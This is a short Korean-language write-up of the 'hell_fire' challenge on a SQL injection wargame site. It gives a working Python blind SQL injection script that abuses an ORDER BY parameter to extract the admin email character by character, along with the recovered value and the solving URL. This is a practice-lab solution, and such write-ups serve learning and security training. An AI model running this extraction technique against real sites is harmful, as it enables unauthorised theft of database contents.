hell_fire

첫 화면이다.

Blind SQL Injection으로 풀었다.

파이썬 코드를 짜면 아래와 같다.

import requests

URL = 'https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order='
PHPSESSID = 'MY_PHPSESSID'
TRUE_PHRASE = 'score</th><tr><td>admin'


def query(payload):
    cookies = {'PHPSESSID': PHPSESSID}
    r = requests.get(URL + payload, cookies=cookies)
    content = r.text
    return TRUE_PHRASE in content


# 28
def find_email_length():
    email_len = 1
    while query("if(id='admin' and length(email)={}, 'id', 'score')".format(email_len)) is False:
        email_len += 1
    print('email_len: {}'.format(email_len))
    return email_len


# admin_secure_email@emai1.com
def find_email():
    email_len = find_email_length()
    email = ''
    for pos in range(1, email_len + 1):
        for character in range(0, 128):
            if query("if(id='admin' and ord(substr(email,{},1))={}, 'id', 'score')".format(pos, character)) is True:
                email += chr(character)
                break
    print('email: {}'.format(email))


find_email()

실행결과, email은 admin_secure_email@emai1.com 이다.

https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?email=admin_secure_email@emai1.com 에 접속하면 문제가 풀린다.